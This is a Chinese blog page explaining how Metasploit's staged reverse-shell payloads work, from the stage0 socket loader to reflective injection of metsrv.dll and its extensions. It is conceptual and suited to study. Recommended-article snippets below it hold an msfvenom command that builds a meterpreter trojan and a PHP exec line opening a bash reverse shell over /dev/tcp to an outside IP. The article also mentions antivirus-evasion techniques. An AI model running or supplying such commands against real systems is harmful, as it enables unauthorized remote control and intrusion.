MSF反弹shell原理

最新推荐文章于 2024-06-17 17:58:57 发布
最新推荐文章于 2024-06-17 17:58:57 发布
阅读量303 收藏
点赞数
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47063945/article/details/134320966
版权

文章目录

MSF反弹shell原理

MSF反弹shell使用的是stage payload方式,这是一种分段式的载荷运行方式,其设计理念是为了满足二进制溢出漏洞利用过程中,由于内存地址中留给攻击者的布局shellcode空间很小的情景,攻击者先利用漏洞向靶机发送一个很小的payload(stage0),达到目标机器与攻击机器建立一个shell通信的目的,然后再通过stage0上传stage1、stage2、stage3…等的方式,逐步将shell的控制权进行移交从而得到一个功能强大的shell

stage0阶段使用的是msfvenom生成的木马,用于建立攻击者与受害者机器之间的网络通信,通常采用反向连接

缓冲区溢出:攻击者利用软件的某个缺陷来传输一段很长的shellcode来溢出目标的缓冲区,从而控制EIP指针来跳转到我们的shellcode上,执行我们的代码,并且希望shellcode不能过长,否则会导致覆盖了上一个函数栈帧的数据导致异常的发生,这也是采用分段载荷运行方式的原因

正向连接:即代理机主动连接目标机,目标把流量发到自己的某个端口,攻击机主动去连接,适合入站规则宽松;

反向连接:即目标机主动连接代理机,目标把流量发给攻击机的某个端口,目标主动去连接,适合入站严格,出站宽松

msfvenom中常用的载荷有:

reverse_tcp:基于tcp的反向连接,受害者机器运行木马后会主动连接到攻击机的特定端口

reverse_http:基于http的反向连接

reverse_https:基于https的反向连接

bind_tcp:基于tcp的正向连接

MSF获取一个meterpreter的流程

shellcode(木马)使靶机链接服务器(stage0阶段)并开辟内存——靶机接收服务器发送过来的stage1阶段载荷(metsrv.dll)——反射dll注入加载到内存中——靶机接收服务器发送过来的stage2阶段载荷(stdapi.dll)——靶机接收服务器发送过来的stage3阶段载荷(priv.dll)——实现meterpreter

stage0阶段木马:建立受害者机器与服务器的通信链接,向内存申请开辟一块空间,以实现stage1阶段载荷的传输;

stage1阶段metsrv.dll:当连接建立之后,会传输metsrv.x64.dll到靶机上,是一个编译好的动态链接库dll文件,一旦metsrv.dll被加载进入内存,stage0通过简单的EIP指针跳转,将指令控制权转交给stage1,stage1即metsrv.dll的前60个字节,这是一段shellcode,一旦被执行,将利用反射式DLL注入技术重新映射metsrv.dll并将其加载进内存中,使其达到无需将写入磁盘或向主机进程注册而能够正常工作的目的,然后其调用DLLMain()函数在这个已经加载的DLL文件上,接着Meterpreter便接管了控制权

stage2阶段stdapi:是Meterpreter扩展DLL,以与metsrv.dll相同的方式反射加载,实现计算机文件、系统、网络等属性的访问

stage3阶段priv.dll:是Meterpreter扩展DLL,以与metsrv.dll相同的方式反射加载,实现权限提升、转储密码哈希和本地提权

在这里插入图片描述

stage0阶段网络通信的建立

参考msf上线原理与自写stage绕过杀软,其中的代码分析是作者自行编写的stage0阶段木马的代码,思路都是类似的

生成的木马可以以exe、elf、c程序、jar程序等形式存在,但是大致上的代码思路是类似的

  1. 使用ws2_32.dll进行socket编程
  2. 使用WSADATA结构体存储windows socket信息,使用WSAStartup()函数生成Windows socket信息,配置好socket的相关信息
  3. connect发起一个连接,指定MSF主机IP和端口号进行通信
  4. 第一次与MSF主机进行通信,MSF发送的数据只有一个数字,是stage1阶段载荷的总大小
  5. 随后为stage1阶段的载荷分配内存
  6. 循环接收stage1阶段载荷
  7. 更改载荷所在内存块的权限为可执行
  8. 使用汇编指令将sock的值放到edi寄存器中,修改eip寄存器的值,去执行载荷

edi寄存器:又称为变址寄存器,主要用于存放存储单元在段内的偏移量,可以实现多种存储器操作的寻址方式

eip寄存器:是扩展指令指针,也成为指令指针寄存器,作用与PC指针类似,用于存储当前正在执行的指令的地址

参考文章

  1. msf上线原理与自写stage绕过杀软:MSF反弹shell的流程和原理,stage0和stage1,小马大马,metsrv.x64.dll,先传小再传大;stage0阶段木马文件源代码分析
  2. shellcode原理是啥:cs的shellcode流程的分析,msf的shellcode流程分析,二者的shellcode都仅仅是一个连接程序,需要其他方式加载金内存执行
  3. meterpreter载荷执行过程及原理:MSF反弹shell分段式载荷上传原理及流程图解、各阶段上传的内容及其功能
  4. 探寻Metasploit Payload模式背后的秘密:与第三篇参考文章类似,但是有更加详细的阶段流程讲解
  5. msfvenom——木马免杀篇:msfvenom生成C语言程序木马,使用C语言和python编译执行,整理了多种方法实现stage0阶段任务
  6. 从meterpreter工作原理到免杀方式的分析:从反汇编的角度分析了stage0阶段payload的执行流程与免杀尝试
stone_zer0
关注
反弹shell原理与实现
悦分享
08-02 3387
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。...
常见的反弹shell的方法以及对反弹shell的解释
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
利用msf实现反弹shell与提权(细节过程秒懂)
Naiisii的博客
01-13 6185
环境 攻击机:Kali ip:192.168.50.183 靶机:Win7(x64) 两者在同一个C段!!!! 生成payload 首先我们生成一个payload文件,如果靶机是64位的建议生成64位的payload,以免后续提权过程受阻 在线快速生成payload网站 这里的IP设置为KaliIP,端口不要与其他服务冲突 接下来我们需要把payload下载到靶机win7(如果有能者可以直接拖拽进靶机也可以) 把下载好的文件放至网页,由靶机win7通过访问网页下载 mv reverse.exe /var/
msfpayload反弹shell
aipei5098的博客
04-14 376
1、前期-- 情景就是当我们获得webshell时,我们想留下我们的后门,这个时候我们可以用到msfpayload与msfconsole结合使用 启动PostgreSQL服务:service postgresql start 启动metasploit服务:service metasploit start 启动msfconsole:msfconsole查看数据库连接状态...
msf反弹shell
qq_41232519的博客
08-14 715
文章目录一、生成木马二、执行监听三、上传并执行木马 一、生成木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.159.128 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为192.168.159.128,监听端口为4444,文件输出格式为exe并保存到路径/tmp/hack.exe
反弹shell原理和实现
u012830303的博客
01-18 3541
当一些框架和代码,不小心让可执行shell命令的函数存在注入漏洞时,会被利用注入漏洞执行一些shell命令。入侵者为了防止漏洞被修复,无法通过正向链接侵入服务器时,会被利用shell反弹原理种马。 首先,侵入者会利用注入参数,创建一个shell.php文件,文件内容如下 通过web访问并执行shell.php文件 exec('bash -i &> /dev/tcp/10.201.61.194/5566 0>&1'); 这条命令的作用是,在服务器建立一个可以与10.201.61.
使用msf进行反弹shell+内网渗透
JSMaster01的博客
12-30 1万+
首先说明一点,反弹shell的前提是该主机能够执行我们的恶意命令 反弹shell原理与灰鸽子的原理是相似的,就是在靶机上执行一个我们msf精心构造的客户端,使靶机主动回连我们攻击机的某个端口。下面开始说明使用msf进行反弹shell的过程。 一、反弹shell: 1.首先使用msf中的msfvenom模块生成一个被控端的客户端文件。这里以Windows 64位为例,具体命令如下:“msfveno...
内网渗透之Windows反弹shell(综合)
墨鱼菜鸡
09-10 1090
目录 反向shell简介 01什么是正向shell 02什么是反向shell Windows反弹shell 01NC正向shell 01NC反向shell 02mshta.exe 通过Metasoloit的HTA Web Server模块发起HTA攻击 通过msfvenom生成恶意hta文件 03Rundll32.exe 04Reg...
利用msfvenom制作木马,并且反弹shell
m0_64444909的博客
09-14 5473
msf
冰蝎下的反弹shell连接msfconsole
热门推荐
Master先生的博客
01-07 5万+
文章目录前言一、使用木马getshell1.搭建环境二、冰蝎配置三、kali监听总结 前言 好久没碰美少妇(MSF)了,恰巧昨天在群里水群,有个表哥问为什么msf监听不到数据。为此我带着表哥的疑问进行了简单的研究。大体的流程和思路我简单记录一下。其中的坑还是不少的,希望这篇文章对初识冰蝎的表哥们有点用处。 一、使用木马getshell 冰蝎之所以强还是在于他的动态二进制加密。这里呢,在冰蝎下载的包中给出了官方的webshell。在server文件夹下。 这里呢,我踩过一个坑。不知道是我电脑配置的问题还是就
2022渗透测试-反弹shell的详细讲解
保持微笑的博客
02-07 5355
1.反弹shell简介 反弹shell是一种反向链接,与正向的ssh等不同,它是在对方电脑执行命令连接到我方的攻击模式,并且这种攻击模式必须搭配远程执行命令漏洞来使用。 2.为什么要进行反弹shell 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器,这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。 那么什么情况下正向连接不太好用了呢: 1. 某客户机中了你的网马,但是它在局域网内,你直接连接不了。 2. 它的ip
内网的MSF接收反向shell
m0_46736332的博客
10-27 3103
内网虚拟机MSF接收外网以及不同局域网机器的反向shell
渗透测试-window反弹shell
lza20001103的博客
05-11 4753
window反弹shell
msf渗透练习-php后门反弹
weixin_49349476的博客
06-09 2776
php后门反弹,就是通过php的后门文件,对目标进行操控。本次使用msf完成(仅供学习)
反弹shell,一篇概括
最新发布
m0_63733486的博客
06-17 113
在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。SSL协议要求建立在可靠的传输层协议(TCP)之上。
Linux系统性能监控命令系列之 lsof
yingchao_yuan的博客
11-05 614
大家好!我是Sean! 继续咱们的Linux系统中的性能监控命令,今天要分享的是lsof。 lsof (list open files) (一个列出当前系统打开文件的工具) 在linux环境下,万物皆文件,通过文件不仅仅可以访问常规数据,还可以访问网络连接和硬件,所以如传输控制协议 (TCP) 和用户数据报协议 (UDP) 套接字等,系统在后台都为该应用程序分配了一个文件描述符,无论这个文件的本质如何,该文件描述符为应用程序与基础操作系统之间的交互提供了通用接口。因为应用程序打开文件的描述符列表提供了大量关
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值